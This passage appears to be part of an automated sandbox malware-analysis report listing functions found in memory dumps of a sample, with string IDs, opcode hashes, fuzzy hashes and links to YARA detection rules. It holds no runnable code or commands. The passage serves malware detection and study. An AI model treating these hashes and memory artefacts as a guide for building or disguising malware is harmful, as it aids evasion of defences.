                                                                                                                                                                                                                                                                          • Opcode ID: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
                                                                                                                                                                                                                                                                          • Instruction ID: 59230c03b5a3a3693ef44b30c97d38267524f76adfdce6de0efbbb4ceb4d7fde
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9822E77290C7408BD724DF38C4913AEBBD2ABD5324F194A2EE5E9973D1DA388941CB47
                                                                                                                                                                                                                                                                          Function 024A144C Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 0$V$e
                                                                                                                                                                                                                                                                          • API String ID: 0-3964817793
                                                                                                                                                                                                                                                                          • Opcode ID: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
                                                                                                                                                                                                                                                                          • Instruction ID: daab1252e0ede302c5111b3bef6e785a02b2cf7c06762f2d637e667f12f6f2d9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D22E43260D7908BD724DF3984943AEBBD2ABD5320F194A2ED5EE873D1D7748941CB42
                                                                                                                                                                                                                                                                          Function 00426054 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                                                          • API String ID: 0-2543814982
                                                                                                                                                                                                                                                                          • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                          • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                                                          Function 024A87DF Relevance: 4.0, Strings: 3, Instructions: 234COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                                                          • API String ID: 0-3307990326
                                                                                                                                                                                                                                                                          • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                          • Instruction ID: 42d08a021de3f72c2cb7fa87eb591ac07f85e20f86aec561d7416a97d7d4ee9e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A081CE756007128FC728CF29C8A0A67B7F2FFA9710B19859DD8824FB65EB34E841CB55
                                                                                                                                                                                                                                                                          Function 0249092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                          • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                          • Instruction ID: 11c3ce01d4b21e2cad106f8ee3e8e99851c685a3892a5c7049a3e18a3c7c256e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 153139B6900609DFDB10CF99C880AAEBBF9FF48328F15514AD841AB310D771EA45CFA4
                                                                                                                                                                                                                                                                          Function 00404CB0 Relevance: 3.3, Strings: 2, Instructions: 833COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 0$8
                                                                                                                                                                                                                                                                          • API String ID: 0-46163386
                                                                                                                                                                                                                                                                          • Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                                          • Instruction ID: d40c633f6dc63a9644a0400b392de52ca6438bdc0a59f23ad90aea60c423d6c9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC7213716087409FD714CF18C880BABBBE1EB88314F04892EF9899B391D379D948DF96
                                                                                                                                                                                                                                                                          Function 02494F17 Relevance: 3.3, Strings: 2, Instructions: 833COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 0$8
                                                                                                                                                                                                                                                                          • API String ID: 0-46163386
                                                                                                                                                                                                                                                                          • Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                                          • Instruction ID: e79fe26171adb3b46b43858c4e65a021ff6669e4393bb9c02a4c81455905edf4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D47227716083409FDB25CF18C890B6BBBE1AF88314F54892EF9998B391D375D949CF92
                                                                                                                                                                                                                                                                          Function 004223B8 Relevance: 3.3, Strings: 2, Instructions: 772COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: "*B$B*B
                                                                                                                                                                                                                                                                          • API String ID: 0-3938277345
                                                                                                                                                                                                                                                                          • Opcode ID: 78e285193c8325869296b3d11f9fc92a1318eae965f379fbd1dbd179110fea27
                                                                                                                                                                                                                                                                          • Instruction ID: c0ff169c622c87bee100c6609ea31c9af3570951461718032b7520edbb3c94ef
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78e285193c8325869296b3d11f9fc92a1318eae965f379fbd1dbd179110fea27
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53421276A00211DFCB18CF68DC90AAEB7B2FF49310F598179E905AB395D734AD11CB84
                                                                                                                                                                                                                                                                          Function 00437399 Relevance: 3.0, Strings: 2, Instructions: 455COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .$kl
                                                                                                                                                                                                                                                                          • API String ID: 0-2631956018
                                                                                                                                                                                                                                                                          • Opcode ID: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                                          • Instruction ID: 6e525d0f0299ed0e456b3adafb39e2bcab09d4ef44449d93680b2b5d8b67f0fb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FE1173A218709CBCB189F78EC5127A73F1FF4A741F4A887DD8818B2A1E7B99950C714
                                                                                                                                                                                                                                                                          Function 0040A940 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: BE$de
                                                                                                                                                                                                                                                                          • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                          • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                                                          Function 0249ABA7 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: BE$de
                                                                                                                                                                                                                                                                          • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                          • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction ID: 0e8e7438c804aa875dc6167410859db01fb727295b33fbb0f872cd46ad9a3b9a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61D1097265C3648BDB24DF2888516AFFFE2EFC1208F18492DE8D59B391D675C506CB82
                                                                                                                                                                                                                                                                          Function 024945D7 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: )$IEND
                                                                                                                                                                                                                                                                          • API String ID: 0-707183367
                                                                                                                                                                                                                                                                          • Opcode ID: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
                                                                                                                                                                                                                                                                          • Instruction ID: 7a98d74c8d7b11716b93e7d51c3c372245116b5bf32aca3e0fd70816f8c0c3f7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86D19BB19083449FEB20CF29C841B5BBBE5AF94304F14892EF9999B381D375D949CB92
                                                                                                                                                                                                                                                                          Function 004239F2 Relevance: 2.8, Strings: 2, Instructions: 296COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: +oQ$?{;}
                                                                                                                                                                                                                                                                          • API String ID: 0-1414831546
                                                                                                                                                                                                                                                                          • Opcode ID: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                                                                                                                                                                                                                                          • Instruction ID: f7e0cf01948a060ca3ae4ae96257901d3d9473cfc3be429b8585dccf822635a3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCB1BFB4E043189FEB20DF68D942B9EBBB0FB45304F1081ADE158AB381D7758946CF96
                                                                                                                                                                                                                                                                          Function 0042B1C0 Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Fg$RU]l
                                                                                                                                                                                                                                                                          • API String ID: 0-3680832515
                                                                                                                                                                                                                                                                          • Opcode ID: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                                                                                                                                                                                                                                          • Instruction ID: 6f8db59bce85ef316af4e5eced37d01641f7d5c841364d3efc2c21db6cf2a903
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2171087120D3808BE7398F25D8A57EB7BD2EBD2304F58996DC0C987392DB78440ACB56
                                                                                                                                                                                                                                                                          Function 024BB427 Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Fg$RU]l
                                                                                                                                                                                                                                                                          • API String ID: 0-3680832515
                                                                                                                                                                                                                                                                          • Opcode ID: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
                                                                                                                                                                                                                                                                          • Instruction ID: dea7b580fab56d4a3e6b28817518e70d1316820d8d3609c21cae5b4d6d744a6d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D471C27121D3808BE7698F25C8617EBBBD6EFD2218F18996DC4D947392DB39400ADB13
                                                                                                                                                                                                                                                                          Function 004256F9 Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: O28+$h
                                                                                                                                                                                                                                                                          • API String ID: 0-657163135
                                                                                                                                                                                                                                                                          • Opcode ID: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                                                                                                                                                                                                                                          • Instruction ID: 943cae955c8ebe7c4b26d457fd1afafbf5e793f4316e69c7cecf830d1c43eab0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B561BE32B887258BD3149A38A8901B7F791EB55350F88473EDD96873C2E63C9D09C3DA
                                                                                                                                                                                                                                                                          Function 024CCD87 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: @$ihgf
                                                                                                                                                                                                                                                                          • API String ID: 0-73152791
                                                                                                                                                                                                                                                                          • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                          • Instruction ID: 3b0646e180deb50f7a5a6296c2ddec3a8370d05c4e091f09dadf3508a8fc815a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 814127B56043018BD754CF28C88177BBBA2FFC2318F24862EE4499B390E735D805CB82
                                                                                                                                                                                                                                                                          Function 024A554C Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Z\$^P
                                                                                                                                                                                                                                                                          • API String ID: 0-3724859648
                                                                                                                                                                                                                                                                          • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                          • Instruction ID: 6ef4766a72a4222674f0c3935a1b9cb7306982faf8762867b4605a3192e60b05
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E941C0B2911600CFC718CF28C9A2A62B7B2FF59314B1A859DD49B8F7A4E738E441CF55
                                                                                                                                                                                                                                                                          Function 0042750D Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: AzB$`rB
                                                                                                                                                                                                                                                                          • API String ID: 0-365317308
                                                                                                                                                                                                                                                                          • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                          • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                                                          Function 00427326 Relevance: 2.5, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: AzB$`rB
                                                                                                                                                                                                                                                                          • API String ID: 0-365317308
                                                                                                                                                                                                                                                                          • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                          • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                                                          Function 00417582 Relevance: 2.2, Strings: 1, Instructions: 985COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
